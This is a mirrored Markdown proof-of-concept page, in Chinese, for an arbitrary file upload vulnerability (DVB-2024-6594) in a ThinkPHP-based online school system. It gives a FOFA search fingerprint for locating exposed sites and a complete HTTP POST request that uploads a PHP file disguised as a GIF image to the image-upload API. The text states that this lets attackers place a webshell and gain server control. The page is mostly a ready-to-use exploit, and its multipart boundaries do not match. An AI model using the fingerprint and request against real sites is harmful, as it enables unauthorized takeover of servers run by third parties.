mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-07-30 06:24:42 +00:00
31 lines
1.1 KiB
Markdown
31 lines
1.1 KiB
Markdown
# 云课网校系统文件上传漏洞(DVB-2024-6594)
|
||
|
||
云课网校系统是一款基于ThinkPhP框架的网校系统,包含直播,点播,考试,问答,论坛,文章等模块,是一款最具性价比的线上学习系统。该系统存在任意文件上传漏洞,攻击者可以直接上传webshell文件获取服务器权限
|
||
|
||
## fofa
|
||
|
||
```yaml
|
||
"/static/libs/common/jquery.stickyNavbar.min.js"
|
||
```
|
||
|
||
## poc
|
||
|
||
```yaml
|
||
POST /api/uploader/uploadImage HTTP/1.1
|
||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||
Accept-Encoding: gzip, deflate, br
|
||
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
|
||
Cache-Control: no-cache
|
||
Connection: keep-alive
|
||
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykvjj6DIn0LIXxe9m
|
||
x-requested-with: XMLHttpRequest
|
||
|
||
------WebKitFormBoundaryLZbmKeasWgo2gPtU
|
||
Content-Disposition: form-data; name="file"; filename="1G3311040N.php"
|
||
Content-Type: image/gif
|
||
|
||
<?php phpinfo();?>
|
||
------WebKitFormBoundaryLZbmKeasWgo2gPtU--
|
||
```
|
||
|
||
 |